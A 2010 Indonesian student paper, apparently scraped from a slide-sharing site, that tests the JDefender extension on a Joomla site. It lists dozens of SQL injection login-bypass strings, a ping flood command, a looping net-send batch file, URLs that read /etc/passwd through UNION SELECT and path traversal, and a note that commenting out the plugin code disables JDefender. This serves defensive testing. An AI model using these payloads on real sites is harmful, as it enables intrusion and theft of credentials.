5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 1/6

 

PENGUJIAN KEAMANAN JDEFENDER UNTUK MENANGKAL SERANGAN SQL

INJECTON, FLOODING DAN PHP INJECTION PADA SEBUAH WEB-SITEBERBASIS JOOMLA

Hari Purnanto hari.purnanto@tk.politekniktelkom.ac.id 

Ir. Nina Hendrarini, MT. nina2bdg@yahoo.com 

Simon Siregar, Ssi. MT. ija72@yahoo.com 

Program Studi Teknik KomputerPoliteknik Telkom Bandung

2010

ABSTRAK

Dalam membangun sebuah web-site diperlukan adanya keamanan atau security.

Keamanan merupakan komponen paling penting dalam jaringan komputer, hal ini harus

menjadi prioritas utama bagi para administrator web-site agar tidak di hack oleh para cracker .Berbicara mengenai keamanan web-site, salah satu keamanan yang Penulis gunakan dalam

Proyek Akhir ini adalah JDefender . Keamanan ini terdiri dari dua file, yaitu component dan bot 

atau plugin.

Dari kedua   file JDefender ini masing-masing diantaranya mempunyai fungsi.

Component  berisi script  program utama  filtering, berfungsi untuk melindungi suatu web-site 

dari serangan cracker . Sedangkan bot atau  plugin berfungsi untuk mengecek atau memeriksa

apakah script  yang ada dalam  plugin ini sama dengan script  yang ada pada   file component ,sehingga script yang ada dalam plugin ini mirip dengan script yang ada dalam file component .

Apabila script yang ada dalam bot atau plugin ini dihapus atau diberi tanda komentar php, maka service plugin dari keamanan  JDefender  ini menjadi tidak berfungsi walaupunservice di administrator -nya diaktifkan atau di enable. Cara ini digunakan untuk melumpuhkan

keamanan  JDefender . Untuk memulihkan kembali kembali  JDefender , salah satu caranyaadalah dengan membuang atau mencabut tanda komentar php yang disisipkan kedalam source

code-nya.

Kata kunci : JDefender, Component, bot atau plugin dan Cracker  

5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 2/6

 

1.  PENDAHULUAN 

Seiring dengan makin

berkembangnya penggunaan internet ,pertukaran informasi dari berbagai belahan

dunia menjadi semakin cepat dan lancar.Isu ketidakamanan kemudian mencuat

karena terjadinya beberapa kasus, seperti

manipulasi data pada database danpencurian username dan password . Hal ini

  juga terjadi pada web-site KPU ( Komisi

Pemilihan Umum ) indonesia pada tahun

2004, dimana isi dari web-site tersebutdiacak-acak oleh pihak yang tidak 

bertanggungjawab. Sehingga data-data dantampilan dari web-site tersebut menjaditidak jelas dan kacau, hal ini dikarenakanbahwa administrator web-site tersebut

kurang memperhatikan mengenai masalah

keamanan.

Salah satu teknik untuk 

menangkal serangan tersebut adalahdengan menggunakan keamanan

 JDefender . Keamanan ini bekerja dengan

mendeteksi dan mengeblok dari setiapserangan yang masuk dari para cracker,

seperti Flood  ( Banjir data di jaringan ),SQL   Injection dan PHP Injection.  JDefender  dapat mengeblok  ip address,

login dan  memfilter string-sting yang

dianggap berbahaya dengan menggunakanregular expressions sehingga para cracker 

tidak dapat masuk sebagai administrator 

yang mana dapat melakukan pencurianusername dan  pasword  serta manipulasi

data pada database.

Keamanan  JDefender  iniselanjutnya akan mengirimkan email alerts

kepada administrator  apabila telah

mendeteksi serangan yang masuk.

Pemberitahuan berupa pengiriman email

ini sangat penting, karena sebagai

konfirmasi kepada adminstrator web-site

agar dengan segera waspada dan tetap

siaga terhadap beberapa serangan

membahayakan yang masuk. Hal initerjadi apabila domain dari web-site telah

dihosting dan kalau belum dihosting tidak 

akan terjadi pemberitahuan berupapengiriman email kepada administrator .

2.  PERCOBAAN SERANGAN

2.1 SQL Injection 

SQL Injection adalah teknik 

untuk  exploit  aplikasi web memakai data

yang diberikan client  dalam query SQL

tanpa menghilangkan karakter denganpotensi bahaya [5]. Berikut adalah contoh

sintaks sql injection yang diterapkan

melalui form login.

Tabel 2.1 Sintaks SQL Injection

No. Sintaks

1. ') or '1'='1-- 

2. or 1=1 –  

3 ” or 1=1–  

4. „ or „a‟=‟a 

5. ” or “a”=”a 

6. „) or (‟a‟=‟a 

7. „ or 0=0 –  

8. ” or 0=0 –  

9. ” or “x”=”x 

10. or 0=0 –  

11 „ or 0=0 # 12 ” or 0=0 # 

13. or 0=0 # 

14. „ or „x‟=‟x 

15. „) or (‟x‟=‟x 

16. „ or 1=1-- 

17. „ or a=a–  

18. “) or (”a”=”a 

5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 3/6

 

19. hi” or “a”=”a 

20. hi” or 1=1 –  

21. hi‟ or 1=1 –  22. hi‟ or „a‟=‟a 

23. hi‟) or (‟a‟=‟a 

24. hi”) or (”a”=”a 

25. 1or 1=1 

26. ') or ('1'='1-- 

27. 1 and 1=1 

28. „ or „‟=‟ 

29. admin' -- 

30. admin' # 

31. admin'/* 

32. ' or 1=1# 33. ' or 1=1/* 

34. ' having 1=1-- 

35. 1' or '1'='1 

36. or1=1-- 

Dari sintaks sql injection di atas, apabila

dijalankan akan memunculkan pesan

“Incorrect Username or Password”.

Berarti penyerangan dengan metode query

sql injection ini tidak berhasil atau tidak 

menemukan error  pada database server 

web-site tersebut.

2.2 FLOODING

Flooding adalah salah satu jenis

serangan di jaringan komputer yang

mengirimkan pesan  – pesan dalam jumlahyang sangat besar ke host  tertentu [3].

Macam  –  macam dari serangan  flooding

adalah sebagai berikut :

2.2.1  Serangan dengan ICMP PING 

Perintahnya adalah : ping 127.0.0.1 -t

Apabila serangan tersebut dijalankan, maka

komputer penyerang akan meminta request 

kepada komputer korban atau server secaraterus menerus. Apabila hal ini segera tidak 

ditangani dengan mengeblok  ip address

komputer penyerang, komputer korban atauserver  dapat hang atau mati karena tidak 

mampu melayani request  data yang

berlebihan.

2.2.2 Serangan dengan NET SEND

Perintahnya adalah dengan mengeklik 

ganda   file .bat -nya. Berikut adalah isi dari file.bat -nya :

net send 127.0.0.1

call serang.bat

File .bat  di atas bernama serang.bat ,apabila  file tersebut diklik ganda maka akan

merequest  komputer tujuan atau server 

secara terus menerus sampai komputertersebut hang atau mati. Syarat agar

serangan ini dapat berjalan adalah denganmengaktifkan service messenger  di

komputer tujuan dan penyerang, hal inidilakukan untuk menyerang komputer

dengan ip address bukan localhost . Apabila

yang diserang adalah komputer tujuan ataulocalhost , maka service messenger  ini tidak 

perlu diaktifkan, karena tanpa diaktikan pun

serangan ini sudah dapat berjalan.

2.3 PHP INJECTION  

PHP Injection adalah adalah

sebuah tindakan untuk  cracking dengan

memanfaatkan bug PHP  Injection ataupun  Remote File Inclusion (RFI), yaitu

pengeksploitasian sebuah target dengan

5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 4/6

 

media PHP  Shell. Macam  –  macam dari

serangan ini adalah sebagai berikut :

2.3.1 Serangan dengan mencuri

password 

Perintahnya adalah :

union+all+select+1,null,load_file('etc/pa

sswd'),4--

Dalam alamat url contoh serangan

lengkapnya adalah sebagai berikut :

http://localhost/joomla/index.php?option=c

om_content&task=view&id=19&Itemid=34+union+all+select+1,null,load_file('etc/ 

passwd'),4--

Apabila serangan di atas dijalankan, maka

 password  yang berada di database server 

web-site atau komputer tujuan dapat

diambil atau diketahui dengan mudah olehpenyerang. Hal ini sangat berbahaya jika

administrator  dari suatu web-site tidak memperhatikan tentang vulnerability dariweb-site-nya.

2.3.2 Serangan dengan mencuripassword dengan metode lain.

Perintahnya adalah :

http://localhost/joomla/index.php?option=c

om_content&task=view&id=19&Itemid=3

4 / passwd%00 

Serangan di atas juga berbahaya, karena

apabila dijalankan password dari komputer

server atau tujuan dapat diketahui.

2.3.3 Serangan dengan mencuri passworddengan metode selain di atas

Perintahnya adalah :

 / etc/passwd

Dalam alamat url contoh serangan

lengkapnya adalah sebagai berikut :

http://localhost/joomla/index.php?option=co

m_content&task=view&id=19&Itemid=34 /e

tc/passwd 

Serangan di atas apabila dijalankan di

alamat url, maka  password  dariadministrator dapat diketahui dengan

mudah.

3.  HASIL PENGUJIAN 

Setelah dilakukan pengujiandengan serangan sql injection, flooding dan

  php injection terhadap sistem keamanan jdefender , bahwa  jdefender  terbukti kuat didalam menangani ketiga serangan di atas.

Hal ini terbukti dengan munculnya alert 

atau warning di halaman web client  atauhalaman web penyerang.

5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 5/6

 

4.  KESIMPULAN DAN SARAN

4.1 KESIMPULAN

Dari hasil implementasi analisisterhadap hasil pengujian sistem maka

didapatkan beberapa kesimpulan antara

lain:

1.  Bahwa sistematika kerja  jdefender 

bekerja dengan mengeblok dari setiap

serangan yang masuk ke suatu web-site,baik itu serangan sql injection, flooding

dan   php injection. Apabila serangantersebut telah terblok, maka  jdefender 

akan memunculkan warning atau alert 

di halaman web client .

2.  Setelah sistem keamanan  jdfender diujidengan serangan sql injection, flooding

dan   php injection terbukti bahwa jdefender  memang kuat di dalam

menangkal serangan sql injection,

 flooding dan php injection di atas.

4.2  SARAN

1.  Salah – satu cara untuk mengembalikan JDefender  menjadi kuat lagi adalah

dengan mencabut atau membuang tandakomentar php ( /* ) untuk tag pembuka

dan tanda ( */ ) untuk  tag penutup.

Pencabutan tanda ini dilakukan dari sisiserver . 

2.  Salah  –  satu cara untuk bisa merubah  password joomla adalah harus dari sisiserver . Hal ini dapat dilakukan dengan

  jalan masuk ke phpmyadmin, ubah  password md5 hash dan salt -nyadengan  password  yang kita inginkan

kemudian pilih drop-down md5

disebelah kiri  password  yang kita buat tadi

dan selanjutnya klik go.

5.  REFERENSI

[1].  Cara Gampang Membuat Website

dengan Joomla untuk Pemula.

Jakarta: PT Elex Media Komputindo,

2008.

[2].  Justin. Clarke. ( 2009 ). SQL Injection

  Attacks and Defense. [ Online ].

Available:http://www.flazx.com/ebook13483.ph

p [ April 15, 2010 ].

[3].  McClure. Stuart, Shah. Saumil, Shah.Shreeraj. ( 2002, Aug 8 ). Web

 Hacking: Attacks and Defense. [

Online ]. Available :

http://www.flazx.com/ebook982.php [

Aug 15, 2010 ]. 

[4].    Network Security Courseware.

Bandung: Politeknik Telkom, 2009.

[5].  Shulman. Amichai. Traditional SQL

 Injection Injection: The Wrong

Solution for the Right Problem. [Online ]. Available:

http://www.imperva.com/resources/A

dc/pdfs/Traditional_SQL_InjectionProtection_The_Wrong_Solution_for_the

_Right_Problem.pdf [ Jun 1, 2010 ].

[6]. 

Utdirartatmo. Firrar.  Ancaman  Internet Hacking dan Trik

 Menanganinya. Yogyakarta: ANDI-

Offset, 2006.

5/16/2018 kasus scurity - slidepdf.com

http://slidepdf.com/reader/full/kasus-scurity 6/6

 

[7].  Romanov. Sergey. ”JDefender”.

Internet:

http://extensions.joomla.org/extensions/access-a-security/site-

security/11359, Mar 12, 2010 [ Jun

4, 2010 ].

[8].  Romanov. Sergey. “JDefender”.

Internet:

http://extensions.joomla.org/extensio

ns/owner/sergeyromanov [ Jun 5,

2010 ].

[9].  Shah. Saumil. "One-way Web

Hacking". Internet: http://net-square.com/papers/one_way/one_wa

y.html#4.0.3, Dec 8, 2003 [ Jun 5,2010 ].